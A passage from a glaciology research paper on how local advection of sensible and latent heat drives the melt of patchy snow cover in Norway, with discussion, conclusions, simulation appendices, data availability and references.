case of . However, the reported wind speed was measured at 1.8 m above the ground, thus implying that the average wind speed for the whole air column under consideration would be higher. Consequently, this affects the leading edge effect due to increased wind shear, and thus also the fluxes towards the surface. Also, the temperature difference between the atmosphere and snow has possibly been overestimated, causing an increased sensible heat flux. The graphs presented by show the temperatures of the bare ground and the atmosphere to be constant near the surface, 6.4 C. However, for the dimensional analysis, the atmospheric temperature mentioned by , i.e., 7.9 C, was used. Overall, these differences in assumptions between the simulations and the field observations make a one-to-one comparison difficult. Yet, the general behavior found in the simulations is similar to that reported in previous literature, i.e., temperature profiles and melting patterns (e.g., ), and shows the potential of DNS as a modeling tool to understand the melting of a patchy snow cover, especially considering that DNS does not violate the assumptions for Monin–Obukhov bulk formulations and is able to resolve the leading edge effect, in contrast to modeling studies with coarser spatial resolutions, which could lead to major errors . As such, this type of simulation is expected to provide more realistic behavior of the leading edge effect on the vertical turbulent heat fluxes, especially when combining it with case-specific boundary conditions.\n\nIn the studied system, the influence of stability on the relative decay of the surface fluxes over distance from the leading edge seems to be negligible, since the sensible heat fluxes in the simulations with and without buoyancy effects show the same decay. However, the snowmelt in the simulation without buoyancy effects is still higher, as the absolute sensible heat fluxes at the leading edge are highest for this simulation. We expect that the decay is similar due to the relatively high wind speeds compared to the temperature difference between the snow and bare ground: 6.4 m s−1 and 8 K, respectively. Overall, this causes the shear-induced turbulence to dominate over the buoyancy-induced turbulence. As multiple studies have suggested a role of stability in snowmelt (e.g., ), stable regions (i.e., snow patches) could have a much larger impact on the amount of wind-driven snowmelt, especially when reducing the turbulence to the edge of collapse. Therefore, it would be interesting to reduce the wind speed and increase the temperature difference between the snow and bare ground to identify the Risn that is needed for stability to become a more important influence on the sensible heat fluxes.\n\n7 Conclusions\n\nIn this study, we examined the melt of a 50 m long snow patch in the Finseelvi catchment, Norway, and investigated the observed melt with highly idealized simulations. The melt estimates, obtained with relatively simple and cheap structure-from-motion photogrammetry, for the upwind and downwind edges of the snow patch are feasible, and the estimated errors are in line with previous studies. The combined influence of the sensible and latent heat fluxes on the snowmelt at the upwind edge is estimated to be between 60 % and 80 %, while this contribution for the entire catchment would be maximally on the order of 10 %, based on previous studies. This estimate is based on the difference between the recorded melt and the net radiation of the snow patch determined from measurements at a meteorological tower near the catchment. This shows that, under specific circumstances, the local advection of the sensible and latent heat can be of major importance in the snowmelt of a patchy snow cover, expressing the necessity of a sound implementation of this process when modeling snowmelt.\n\nIn the idealized simulations based on measurements done by on a single 15 m snow patch on a flat surface, the sensible heat fluxes reduce over distance from the leading edge, following a constant power law. These reductions are caused by the cooling of the air above the snow patch while the wind speed and surface roughness are constant over the snow patch. Other simulations, in which the typical snow patch length is doubled and quadrupled, show exactly the same behavior over snow patches, such that larger snow patches receive less sensible heat on average. Domain-averaged sensible heat fluxes even reduced by 15 % and 25 %, respectively, with a doubling and a quadrupling of the typical snow patch size. Overall, this implies that the sensible (and likely also the untested latent) heat fluxes have a lower influence on the snowmelt in catchments with typically larger snow patches.\n\nWhen comparing the simulated behavior to the observed melt in the field, the observed vertical turbulent heat fluxes at the upwind edge are of the same order of magnitude as the simulations, especially when considering the inclusion of the diurnal cycle in these estimates. Moreover, based on the simulations, it is expected that the behavior found in the simulations also explains the reductions found in the field. However, it should be noted that the decay of sensible heat fluxes over distance from the leading edge measured by was higher than the simulated decay, for which some potential causes can be identified, such as a Reynolds number that is too low and inaccuracies in the nondimensionalization.\n\nYet, the idealized simulations have shown the potential of direct numerical simulations to simulate a patchy snow cover, especially when compared to the errors found for other simulation types. All performed simulations show the ability to simulate the leading edge effect, and clear IBLs form over snow patches. For comparison, studies that make use of large-eddy simulations, such as , report large errors compared with measurements. For our study, the flow characteristics are similar to controlled and field measurements. Aside from the measurements done by in the field, the measurements done by in a wind tunnel also show similar shapes for the temperature profiles above snow patches. Some characteristics vary compared to observations, such as the height of our IBLs compared to , but the general outcome seems promising for future research. Overall, the simulations allow us to extract very detailed information on the atmospheric behavior above a snow patch and can be used as a tool for achieving a better understanding of melting patchy snow covers.\n\nAppendix A: Orthoimages", null, "Figure A1The resulting height change maps used for Fig. 4 plotted over the real-color orthoimages, which are used for distinguishing snow from bare ground, after removing isolated groups of cells and median filtering. The insets show zoomed areas of the upwind edge for more detail.\n\nAppendix B: Surface generation\n\nTo create the surfaces for the simulations, noise is generated in Fourier space such that seemingly random patterns with a specified wavelength arise. These wavelengths are prescribed in the form of 2D power spectra. This method is applied so that patches at opposing walls fit together and flow that leaves the system on one side continues over the same snow patch when it reenters the system on the opposite wall. This enables the model to solve the periodic boundary conditions.\n\nInitially, a field with random phases between 0 and 2π is generated. These phases are applied in Euler's law (i.e., ${e}^{i\\mathit{\\phi }}=\\mathrm{cos}\\mathit{\\phi }+i\\mathrm{sin}\\mathit{\\phi }$) such that the phases are described in exponential form. The phases are multiplied with the desired magnitude per phase such that the Fourier space is generated ($z=|z|{e}^{i\\mathit{\\phi }}$ and Figs. B1B3). Eventually, a 2D field with dominant patterns is obtained by returning to physical space by using the inverse fast Fourier transform in Fourier space. Also, to avoid numerical instabilities in MicroHH, a Gaussian filter is applied on the surface with a standard deviation of 1 grid cell. When this filter overlaps the edges of the domain, the values at the opposing edge are applied.\n\nThe specified spectra for all generated surfaces consist of two broad peaks (Figs. B1B3). The peak with the lowest wavenumber has the higher factor and, thus, gives the dominant structures to the snow patch distribution. The peak with the higher wavenumber (i.e., 3 times the average wavenumber of the main peak) has a lower factor, such that some smaller fluctuations occur within the larger structures, giving the patches a more realistic appearance. For the surfaces in the P30m and P60m simulations, the wavenumber of the main peak is reduced by a factor of 2 and 4, respectively, compared to the surfaces in the P15m and P15m-NB simulations. This implies an average snow patch length in reality of 15, 30, and 60 m for the P15m (and P15m-NB), P30m, and P60m simulations, respectively.", null, "Figure B1Generated surface temperature and the applied Fourier space in absolute form for the P15m and P15m-NB simulations. The generated surface temperature (a) was obtained by applying the inverse fast Fourier transform in Fourier space (b).", null, "Figure B2Generated surface temperature and the applied Fourier space in absolute form for the P30m simulation. The generated surface temperature (a) was obtained by applying the inverse fast Fourier transform in Fourier space (b).", null, "Figure B3Generated surface temperature and the applied Fourier space in absolute form for the P60m simulation. The generated surface temperature (a) was obtained by applying the inverse fast Fourier transform in Fourier space (b).\n\nCode and data availability\n\nFor the snowmelt observations, the images used and a brief description of the photogrammetry workflow are available at https://doi.org/10.5281/zenodo.4704873 . For the numerical experiments, exemplary input files and model output can be found at https://doi.org/10.5281/zenodo.4705288 .\n\nAuthor contributions\n\nLDvdV carried out the research under the supervision of AJT, NP, RS, and CCvH. LDvdV designed the numerical experiment together with CCvH and RS, and LDvdV designed the field experiment together with AJT and NP. LG helped perform the photogrammetry analysis. LDvdV prepared the manuscript, with contributions from all co-authors.\n\nCompeting interests\n\nThe contact author has declared that none of the authors have any competing interests.\n\nDisclaimer\n\nPublisher’s note: Copernicus Publications remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.\n\nAcknowledgements\n\nWe would like to thank the anonymous reviewer and Rebecca Mott for their valuable feedback that helped to improve this manuscript. The simulations were carried out on the Dutch national e-infrastructure with the support of SURF Cooperative.\n\nReview statement\n\nThis paper was edited by Ketil Isaksen and reviewed by Rebecca Mott and one anonymous referee.\n\nReferences\n\nAalstad, K., Westermann, S., Schuler, T. V., Boike, J., and Bertino, L.: Ensemble-based assimilation of fractional snow-covered area satellite retrievals to estimate the snow distribution at Arctic sites, The Cryosphere, 12, 247–270, https://doi.org/10.5194/tc-12-247-2018, 2018. a\n\nAnderson, B., Mackintosh, A., Stumm, D., George, L., Kerr, T., Winter-Billington, A., and Fitzsimons, S.: Climate sensitivity of a high-precipitation glacier in New Zealand, J. Glaciology, 56, 114–128, https://doi.org/10.3189/002214310791190929, 2010. a\n\nBarnett, T. P., Adam, J. C., and Lettenmaier, D. P.: Potential impacts of a warming climate on water availability in snow-dominated regions, Nature, 438, 303–309, https://doi.org/10.1038/nature04141, 2005. a\n\nBerghuijs, W. R., Woods, R. A., and Hrachowitz, M.: A precipitation shift from snow towards rain leads to a decrease in streamflow, Nat. Clim. Change, 4, 583–586, https://doi.org/10.1038/NCLIMATE2246, 2014. a, b\n\nBonekamp, P. N. J., van Heerwaarden, C. C., Steiner, J. F., and Immerzeel, W. W.: Using 3D turbulence-resolving simulations to understand the impact of surface properties on the energy balance of a debris-covered glacier, The Cryosphere, 14, 1611–1632, https://doi.org/10.5194/tc-14-1611-2020, 2020. a, b, c\n\nBrandenberger, A. J.: Map of the McCall Glacier, Brooks Range, Alaska, American Geographical Society, New York, AGS Report, 11, https://collections.lib.uwm.edu/digital/collection/agdm/id/6815/(last access: 23 September 2022), 1959. a\n\nBuckingham, E.: On physically similar systems; illustrations of the use of dimensional equations, Phys. Rev., 4, 345–376, https://doi.org/10.1103/PhysRev.4.345​​​​​​​, 1914. a\n\nBühler, Y., Adams, M. S., Bösch, R., and Stoffel, A.: Mapping snow depth in alpine terrain with unmanned aerial systems (UASs): potential and limitations, The Cryosphere, 10, 1075–1088, https://doi.org/10.5194/tc-10-1075-2016, 2016. a\n\nCimoli, E., Marcer, M., Vandecrux, B., Bøggild, C. E., Williams, G., and Simonsen, S. B.: Application of low-cost UASs and digital photogrammetry for high-resolution snow depth mapping in the Arctic, Remote Sensing, 9, 1144​​​​​​​, https://doi.org/10.3390/rs9111144, 2017. a\n\nConway, J. and Cullen, N.: Constraining turbulent heat flux parameterization over a temperate maritime glacier in New Zealand, Ann. Glaciol., 54, 41–51, https://doi.org/10.3189/2013AoG63A604, 2013. a\n\nDadic, R., Mott, R., Lehning, M., Carenzo, M., Anderson, B., and Mackintosh, A.: Sensitivity of turbulent fluxes to wind speed over snow surfaces in different climatic settings, Adv. Water Resour., 55, 178–189, https://doi.org/10.1016/j.advwatres.2012.06.010, 2013. a\n\nDeBeer, C. M. and Pomeroy, J. W.: Influence of snowpack and melt energy heterogeneity on snow cover depletion and snowmelt runoff simulation in a cold mountain environment, J. Hydrol., 553, 199–213, https://doi.org/10.1016/j.jhydrol.2017.07.051, 2017. a\n\nDeems, J. S., Painter, T. H., and Finnegan, D. C.: Lidar measurement of snow depth: a review, J. Glaciol., 59, 467–479, https://doi.org/10.3189/2013JoG12J154, 2013. a\n\nDong, C. and Menzel, L.: Snow process monitoring in montane forests with time-lapse photography, Hydrol. Process., 31, 2872–2886, https://doi.org/10.1002/hyp.11229, 2017. a\n\nDozier, J. and Warren, S. G.: Effect of viewing angle on the infrared brightness temperature of snow, Water Resour. Res., 18, 1424–1434, https://doi.org/10.1029/WR018i005p01424, 1982. a\n\nEgli, L., Jonas, T., Grünewald, T., Schirmer, M., and Burlando, P.: Dynamics of snow ablation in a small Alpine catchment observed by repeated terrestrial laser scans, Hydrol. Process., 26, 1574–1585, https://doi.org/10.1002/hyp.8244, 2012. a\n\nEssery, R., Granger, R., and Pomeroy, J.: Boundary-layer growth and advection of heat over snow and soil patches: Modellling and parameterization, Hydrol. Process., 20, 953–967, https://doi.org/10.1002/hyp.6122, 2006. a, b, c\n\nFilhol, S., Perret, A., Girod, L., Sutter, G., Schuler, T., and Burkhart, J.: Time-Lapse Photogrammetry of Distributed Snow Depth During Snowmelt, Water Resour. Res., 55, 7916–7926, https://doi.org/10.1029/2018WR024530, 2019. a, b, c\n\nFontrodona Bach, A., Van der Schrier, G., Melsen, L., Klein Tank, A., and Teuling, A.: Widespread and accelerated decrease of observed mean and extreme snow depth over Europe, Geophys. Res. Lett., 45, 12–312, https://doi.org/10.1029/2018GL079799, 2018. a\n\nFujita, K., Hiyama, K., Iida, H., and Ageta, Y.: Self-regulated fluctuations in the ablation of a snow patch over four decades, Water Resour. Res., 46, W11541​​​​​​​, https://doi.org/10.1029/2009WR008383, 2010. a, b\n\nGarratt, J. R.: The internal boundary layer – A review, Bound.-Lay. Meteorol., 50, 171–203, https://doi.org/10.1161/01.RES.80.6.877, 1990. a, b\n\nGarvelmann, J., Pohl, S., and Weiler, M.: From observation to the quantification of snow processes with a time-lapse camera network, Hydrol. Earth Syst. Sci., 17, 1415–1429, https://doi.org/10.5194/hess-17-1415-2013, 2013. a\n\nGirod, L., Nuth, C., Kääb, A., Etzelmüller, B., and Kohler, J.: Terrain changes from images acquired on opportunistic flights by SfM photogrammetry, The Cryosphere, 11, 827–840, https://doi.org/10.5194/tc-11-827-2017, 2017. a\n\nGolombek, R., Kittelsen, S. A., and Haddeland, I.: Climate change: impacts on electricity markets in Western Europe, Climatic Change, 113, 357–370, https://doi.org/10.1007/s10584-011-0348-6, 2012. a\n\nGranger, R. J., Pomeroy, J. W., and Parviainen, J.: Boundary-layer integration approach to advection of sensible heat to a patchy snow cover, Hydrol. Process., 16, 3559–3569, https://doi.org/10.1002/hyp.1227, 2002. a, b, c, d\n\nGranger, R. J., Essery, R., and Pomeroy, J. W.: Boundary-layer growth over snow and soil patches: Field observations, Hydrol. Process., 20, 943–951, https://doi.org/10.1002/hyp.6123, 2006. a, b\n\nGroffman, P. M., Driscoll, C. T., Fahey, T. J., Hardy, J. P., Fitzhugh, R. D., and Tierney, G. L.: Colder soils in a warmer world: a snow manipulation study in a northern hardwood forest ecosystem, Biogeochemistry, 56, 135–150, https://doi.org/10.1023/A:1013039830323, 2001. a\n\nGrünewald, T., Schirmer, M., Mott, R., and Lehning, M.: Spatial and temporal variability of snow depth and ablation rates in a small mountain catchment, The Cryosphere, 4, 215–225, https://doi.org/10.5194/tc-4-215-2010, 2010. a\n\nGrünewald, T., Wolfsperger, F., and Lehning, M.: Snow farming: conserving snow over the summer season, The Cryosphere, 12, 385–400, https://doi.org/10.5194/tc-12-385-2018, 2018. a\n\nHamilton, T. D.: Comparative glacier photographs from northern Alaska, J. Glaciol., 5, 479–487, https://doi.org/10.3189/S0022143000018451, 1965. a\n\nHarder, P., Pomeroy, J. W., and Helgason, W.: Local-Scale Advection of Sensible and Latent Heat During Snowmelt, Geophys. Res. Lett., 44, 9769–9777, https://doi.org/10.1002/2017GL074394, 2017. a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r, s, t, u, v, w, x, y, z, aa, ab, ac, ad, ae, af, ag, ah\n\nHarder, P., Pomeroy, J. W., and Helgason, W. D.: A simple model for local-scale sensible and latent heat advection contributions to snowmelt, Hydrol. Earth Syst. Sci., 23, 1–17, https://doi.org/10.5194/hess-23-1-2019, 2019. a, b, c, d, e\n\nHarder, P., Pomeroy, J. W., and Helgason, W. D.: Improving sub-canopy snow depth mapping with unmanned aerial vehicles: lidar versus structure-from-motion techniques, The Cryosphere, 14, 1919–1935, https://doi.org/10.5194/tc-14-1919-2020, 2020. a\n\nHarding, R.: Exchanges of energy and mass associated with a melting snowpack, in: Modelling Snowmelt-Induced Processes, Budapest, July 1986, edited by: Morris, E. M., IAHS Publication, 3–15, ISBN 9780947571603, 1986. a, b, c, d\n\nHärer, S., Bernhardt, M., Corripio, J. G., and Schulz, K.: PRACTISE – Photo Rectification And ClassificaTIon SoftwarE (V.1.0), Geosci. Model Dev., 6, 837–848, https://doi.org/10.5194/gmd-6-837-2013, 2013. a\n\nHock, R.: Temperature index melt modelling in mountain areas, J. Hydrol., 282, 104–115, https://doi.org/10.1016/S0022-1694(03)00257-9, 2003. a\n\nHock, R.: Glacier melt: a review of processes and their modelling, Prog. Phys. Geog., 29, 362–391, https://doi.org/10.1191/0309133305pp453ra, 2005. a\n\nHojatimalekshah, A., Uhlmann, Z., Glenn, N. F., Hiemstra, C. A., Tennant, C. J., Graham, J. D., Spaete, L., Gelvin, A., Marshall, H.-P., McNamara, J. P., and Enterkine, J.: Tree canopy and snow depth relationships at fine scales with terrestrial laser scanning, The Cryosphere, 15, 2187–2209, https://doi.org/10.5194/tc-15-2187-2021, 2021. a\n\nJacobs, J. M., Hunsaker, A. G., Sullivan, F. B., Palace, M., Burakowski, E. A., Herrick, C., and Cho, E.: Snow depth mapping with unpiloted aerial system lidar observations: a case study in Durham, New Hampshire, United States, The Cryosphere, 15, 1485–1500, https://doi.org/10.5194/tc-15-1485-2021, 2021. a\n\nKawamura, H., Ohsaka, K., Abe, H., and Yamamoto, K.: DNS of turbulent heat transfer in channel flow with low to medium-high Prandtl number fluid, Int. J. Heat Fluid Fl., 19, 482–491, https://doi.org/10.1016/S0142-727X(98)10026-7, 1998. a\n\nKumar, M., Marks, D., Dozier, J., Reba, M., and Winstral, A.: Evaluation of distributed hydrologic impacts of temperature-index and energy-based snow models, Adv. Water Resour., 56, 77–89, https://doi.org/10.1016/j.advwatres.2013.03.006, 2013. a\n\nLehning, M., Völksch, I., Gustafsson, D., Nguyen, T. A., Stähli, M., and Zappa, M.: ALPINE3D: a detailed model of mountain surface processes and its application to snow hydrology, Hydrol. Process., 20, 2111–2128, https://doi.org/10.1002/hyp.6204, 2006. a\n\nLejeune, Y., Bouilloud, L., Etchevers, P., Wagnon, P., Chevallier, P., Sicart, J.-E., Martin, E., and Habets, F.: Melting of snow cover in a tropical mountain environment in Bolivia: Processes and modeling, J. Hydrometeorol., 8, 922–937, https://doi.org/10.1175/JHM590.1, 2007. a\n\nListon, G. E.: Local Advection of Momentum, Heat and Moisture during the Melt of Patch Snow Covers, J. Appl. Meteorol., 34, 1705–1716, https://journals.ametsoc.org/view/journals/apme/34/7/1520-0450-34_7_1705.xml?tab_body=abstract-display (last access: 4 October 2022​​​​​​​), 1995. a\n\nListon, G. E.: Representing subgrid snow cover heterogeneities in regional and global models, J. Climate, 17, 1381–1397, https://doi.org/10.1175/1520-0442(2004)017<1381:RSSCHI>2.0.CO;2, 2004. a\n\nLoth, B. and Graf, H.-F.: Modeling the snow cover in climate studies: 2. The sensitivity to internal snow parameters and interface processes, J. Geophys. Res.-Atmos., 103, 11329–11340, https://doi.org/10.1029/97JD01412, 1998. a\n\nMale, D. H. and Granger, R. J.: Snow surface energy exchange, Water Resour. Res., 17, 609–627, https://doi.org/10.1029/WR017i003p00609, 1981. a\n\nMarsh, P., Pomeroy, J., and Neumann, N.: Sensible heat flux and local advection over a heterogeneous landscape at an Arctic tundra site during snowmelt, Ann. Glaciol., 25, 132–136, https://doi.org/10.3189/S0260305500013926, 1997. a\n\nMarsh, P., Neumann, N., Essery, R., and Pomeroy, J.: Model estimates of local advection of sensible heat over a patchy snow cover, in: Interactions between the Cryosphere, Climate and Greenhouse Gases, 103–110, ISBN 9781901502909, 1999. a, b, c, d\n\nMarty, C., Philipona, R., Fröhlich, C., and Ohmura, A.: Altitude dependence of surface radiation fluxes and cloud forcing in the alps: results from the alpine surface radiation budget network, Theor. Appl. Climatol., 72, 137–155, https://doi.org/10.1007/s007040200019, 2002. a\n\nMelsen, L. A., Addor, N., Mizukami, N., Newman, A. J., Torfs, P. J. J. F., Clark, M. P., Uijlenhoet, R., and Teuling, A. J.: Mapping (dis)agreement in hydrologic projections, Hydrol. Earth Syst. Sci., 22, 1775–1791, https://doi.org/10.5194/hess-22-1775-2018, 2018. a, b\n\nMoin, P. and Mahesh, K.: Direct Numerical Simulation: A Tool in Turbulence Research​​​​​​​, Annu. Rev. Fluid Mech., 30, 539–578, https://doi.org/10.1146/annurev.fluid.30.1.539, 1998. a\n\nMoser, R. D., Kim, J., and Mansour, N. N.: Direct numerical simulation of turbulent channel flow up to Reτ=590, Phys. Fluids, 11, 943–945, https://doi.org/10.1063/1.869966, 1999. a, b, c, d, e, f, g, h, i, j\n\nMote, P. W., Li, S., Lettenmaier, D. P., Xiao, M., and Engel, R.: Dramatic declines in snowpack in the western US, npj Clim. Atmos. Sci., 1, 2​​​​​​​, https://doi.org/10.1038/s41612-018-0012-1, 2018. a\n\nMott, R., Egli, L., Grünewald, T., Dawes, N., Manes, C., Bavay, M., and Lehning, M.: Micrometeorological processes driving snow ablation in an Alpine catchment, The Cryosphere, 5, 1083–1098, https://doi.org/10.5194/tc-5-1083-2011, 2011. a, b, c\n\nMott, R., Gromke, C., Grünewald, T., and Lehning, M.: Relative importance of advective heat transport and boundary layer decoupling in the melt dynamics of a patchy snow cover, Adv. Water Resour., 55, 88–97, https://doi.org/10.1016/j.advwatres.2012.03.001, 2013. a\n\nMott, R., Daniels, M., and Lehning, M.: Atmospheric Flow Development and Associated Changes in Turbulent Sensible Heat Flux over a Patchy Mountain Snow Cover, J. Hydrometeorol., 16, 1315–1340, https://doi.org/10.1175/JHM-D-14-0036.1, 2015. a, b\n\nMott, R., Paterna, E., Horender, S., Crivelli, P., and Lehning, M.: Wind tunnel experiments: cold-air pooling and atmospheric decoupling above a melting snow patch, The Cryosphere, 10, 445–458, https://doi.org/10.5194/tc-10-445-2016, 2016. a, b, c, d\n\nMott, R., Schlögl, S., Dirks, L., and Lehning, M.: Impact of Extreme Land Surface Heterogeneity on Micrometeorology over Spring Snow Cover, J. Hydrometeorol., 18, 2705–2722, https://doi.org/10.1175/JHM-D-17-0074.1, 2017. a, b\n\nMott, R., Vionnet, V., and Grünewald, T.: The seasonal snow cover dynamics: review on wind-driven coupling processes, Front. Earth Sci., 6, 197​​​​​​​, https://doi.org/10.3389/feart.2018.00197, 2018. a, b, c, d\n\nMott, R., Wolf, A., Kehl, M., Kunstmann, H., Warscher, M., and Grünewald, T.: Avalanches and micrometeorology driving mass and energy balance of the lowest perennial ice field of the Alps: a case study, The Cryosphere, 13, 1247–1265, https://doi.org/10.5194/tc-13-1247-2019, 2019. a\n\nMott, R., Stiperski, I., and Nicholson, L.: Spatio-temporal flow variations driving heat exchange processes at a mountain glacier, The Cryosphere, 14, 4699–4718, https://doi.org/10.5194/tc-14-4699-2020, 2020. a\n\nNolan, M., Larsen, C., and Sturm, M.: Mapping snow depth from manned aircraft on landscape scales at centimeter resolution using structure-from-motion photogrammetry, The Cryosphere, 9, 1445–1463, https://doi.org/10.5194/tc-9-1445-2015, 2015. a, b\n\nOlyphant, G. A. and Isard, S. A.: The role of advection in the energy balance of late-lying snowfields: Niwot Ridge, Front Range, Colorado, Water Resour. Res., 24, 1962–1968, https://doi.org/10.1029/WR024i011p01962, 1988. a, b\n\nPainter, T. H., Berisford, D. F., Boardman, J. W., Bormann, K. J., Deems, J. S., Gehrke, F., Hedrick, A., Joyce, M., Laidlaw, R., Marks, D., Mattmann, C., McGurk, B., Ramirez, P., Richardson, M., Skiles, S. M., Seidel, F. C., and Winstral, A.: The Airborne Snow Observatory: Fusion of scanning lidar, imaging spectrometer, and physically-based modeling for mapping snow water equivalent and snow albedo, Remote Sens. Environ., 184, 139–152, https://doi.org/10.1016/j.rse.2016.06.018, 2016. a\n\nPlüss, C. and Mazzoni, R.: The Role of Turbulent Heat Fluxes in the Energy Balance of High Alpine Snow Cover, Hydrol. Res., 25, 25–38, https://doi.org/10.2166/nh.1994.0017, 1994. a, b\n\nPohl, S. and Marsh, P.: Modelling the spatial–temporal variability of spring snowmelt in an arctic catchment, Hydrol. Process., 20, 1773–1792, https://doi.org/10.1002/hyp.5955, 2006. a, b\n\nPope, S.: Turbulent Flows, Cambridge University Press, ISBN 9780511840531, 2000. a\n\nRupnik, E., Daakir, M., and Deseilligny, M. P.: MicMac – a free, open-source solution for photogrammetry, Open Geospatial Data, Software and Standards, 2, 14​​​​​​​, https://doi.org/10.1186/s40965-017-0027-2, 2017. a\n\nSauter, T. and Galos, S. P.: Effects of local advection on the spatial sensible heat flux variation on a mountain glacier, The Cryosphere, 10, 2887–2905, https://doi.org/10.5194/tc-10-2887-2016, 2016. a, b\n\nSchlögl, S., Lehning, M., Nishimura, K., Huwald, H., Cullen, N. J., and Mott, R.: How do Stability Corrections Perform in the Stable Boundary Layer Over Snow?, Bound.-Lay. Meteorol., 165, 161–180, https://doi.org/10.1007/s10546-017-0262-1, 2017. a\n\nSchlögl, S., Lehning, M., and Mott, R.: How Are Turbulent Sensible Heat Fluxes and Snow Melt Rates Affected by a Changing Snow Cover Fraction?, Front. Earth Sci., 6, 154, https://doi.org/10.3389/feart.2018.00154, 2018a. a, b, c, d, e, f, g, h, i\n\nSchlögl, S., Lehning, M., Fierz, C., and Mott, R.: Representation of Horizontal Transport Processes in Snowmelt Modeling by Applying a Footprint Approach, Front. Earth Sci., 6, 120​​​​​​​, https://doi.org/10.3389/feart.2018.00120, 2018b. a, b, c\n\nSicart, J. E., Hock, R., and Six, D.: Glacier melt, air temperature, and energy balance in different climates: The Bolivian Tropics, the French Alps, and northern Sweden, J. Geophys. Res.-Atmos., 113, D24113, https://doi.org/10.1029/2008JD010406, 2008. a\n\nSilantyeva, O., Burkhart, J. F., Bhattarai, B. C., Skavhaug, O., and Helset, S.: Operational hydrology in highly steep areas: evaluation of tin-based toolchain, EGU General Assembly 2020, Online, 4–8 May 2020, EGU2020-8172, https://doi.org/10.5194/egusphere-egu2020-8172, 2020.  a\n\nSturm, M. and Benson, C.: Scales of spatial heterogeneity for perennial and seasonal snow layers, Ann. Glaciol., 38, 253–260, https://doi.org/10.3189/172756404781815112, 2004. a\n\nSturm, M., Goldstein, M. A., and Parr, C.: Water and life from snow: A trillion dollar science question, Water Resour. Res., 53, 3534–3544, https://doi.org/10.1002/2017WR020840, 2017. a\n\nvan der Valk, L. D., Teuling, A. J., Girod, L., Pirk, N., Stoffer, R., and van Heerwaarden, C. C.: Snowmelt observations: Understanding wind-driven melt of patchy snow cover, Zenodo [data set], https://doi.org/10.5281/zenodo.4704873, 2021a. a\n\nvan der Valk, L. D., Teuling, A. J., Girod, L., Pirk, N., Stoffer, R., and van Heerwaarden, C. C.: Simulation output: Understanding wind-driven melt of patchy snow cover, Zenodo [data set], https://doi.org/10.5281/zenodo.4705288, 2021b. a\n\nvan Heerwaarden, C. C. and Mellado, J. P.: Growth and Decay of a Convective Boundary Layer over a Surface with a Constant Temperature, J. Atmos. Sci., 73, 2165–2177, https://doi.org/10.1175/JAS-D-15-0315.1, 2016. a\n\nvan Heerwaarden, C. C., van Stratum, B. J. H., Heus, T., Gibbs, J. A., Fedorovich, E., and Mellado, J. P.: MicroHH 1.0: a computational fluid dynamics code for direct numerical simulation and large-eddy simulation of atmospheric boundary layer flows, Geosci. Model Dev., 10, 3145–3165, https://doi.org/10.5194/gmd-10-3145-2017, 2017. a, b\n\nVionnet, V., Marsh, C. B., Menounos, B., Gascoin, S., Wayand, N. E., Shea, J., Mukherjee, K., and Pomeroy, J. W.: Multi-scale snowdrift-permitting modelling of mountain snowpack, The Cryosphere, 15, 743–769, https://doi.org/10.5194/tc-15-743-2021, 2021. a\n\nViviroli, D., Dürr, H. H., Messerli, B., Meybeck, M., and Weingartner, R.: Mountains of the world, water towers for humanity: Typology, mapping, and global significance, Water Resour. Res., 43, W07447​​​​​​​, https://doi.org/10.1029/2006WR005653, 2007. a\n\nWeismann, R. N.: Snowmelt: A Two-Dimensional Turbulent Diffusion Model, Water Resour. Res., 13, 337–342, https://doi.org/10.1029/WR013i002p00337, 1977. a, b\n\nWheeler, J. A., Cortés, A. J., Sedlacek, J., Karrenberg, S., van Kleunen, M., Wipf, S., Hoch, G., Bossdorf, O., and Rixen, C.: The snow and the willows: earlier spring snowmelt reduces performance in the low-lying alpine shrub Salix herbacea, J. Ecol., 104, 1041–1050, https://doi.org/10.1111/1365-2745.12579, 2016. a\n\nXue, M., Droegemeier, K. K., Wong, V., Shapiro, A., Brewster, K., Carr, F., Weber, D., Liu, Y., and Wang, D.: The Advanced Regional Prediction System (ARPS) – A multi-scale nonhydrostatic atmospheric simulation and prediction tool. Part II: Model physics and applications, Meteorol. Atmos. Phys., 76, 143–165, https://doi.org/10.1007/s007030170027, 2001. a" ]
[ null, "https://tc.copernicus.org/articles/16/4319/2022/tc-16-4319-2022-avatar-thumb150.png", null, "https://tc.copernicus.org/articles/16/4319/2022/tc-16-4319-2022-f01-thumb.png", null, "https://tc.copernicus.org/articles/16/4319/2022/tc-16-4319-2022-f02-thumb.png", null, "https://tc.copernicus.org/articles/16/4319/2022/tc-16-4319-2022-t01-thumb.png", null, "https://tc.copernicus.org/articles/16/4319/2022/tc-16-4319-2022-t02-thumb.png", null, "https://tc.copernicus.org/articles/16/4319/2022/tc-16-4319-2022-f03-thumb.png", null, "https://tc.copernicus.org/articles/16/4319/2022/tc-16-4319-2022-f04-thumb.png", null, "https://tc.copernicus.org/articles/16/4319/2022/tc-16-4319-2022-t03-thumb.png", null, "https://tc.copernicus.org/articles/16/4319/2022/tc-16-4319-2022-t04-thumb.png", null, "https://tc.copernicus.org/articles/16/4319/2022/tc-16-4319-2022-f05-thumb.png", null, "https://tc.copernicus.org/articles/16/4319/2022/tc-16-4319-2022-f06-thumb.png", null, "https://tc.copernicus.org/articles/16/4319/2022/tc-16-4319-2022-f07-thumb.png", null, "https://tc.copernicus.org/articles/16/4319/2022/tc-16-4319-2022-f08-thumb.png", null, "https://tc.copernicus.org/articles/16/4319/2022/tc-16-4319-2022-f09-thumb.png", null, "https://tc.copernicus.org/articles/16/4319/2022/tc-16-4319-2022-f10-thumb.png", null, "https://tc.copernicus.org/articles/16/4319/2022/tc-16-4319-2022-f11-thumb.png", null, "https://tc.copernicus.org/articles/16/4319/2022/tc-16-4319-2022-f12-thumb.png", null ]
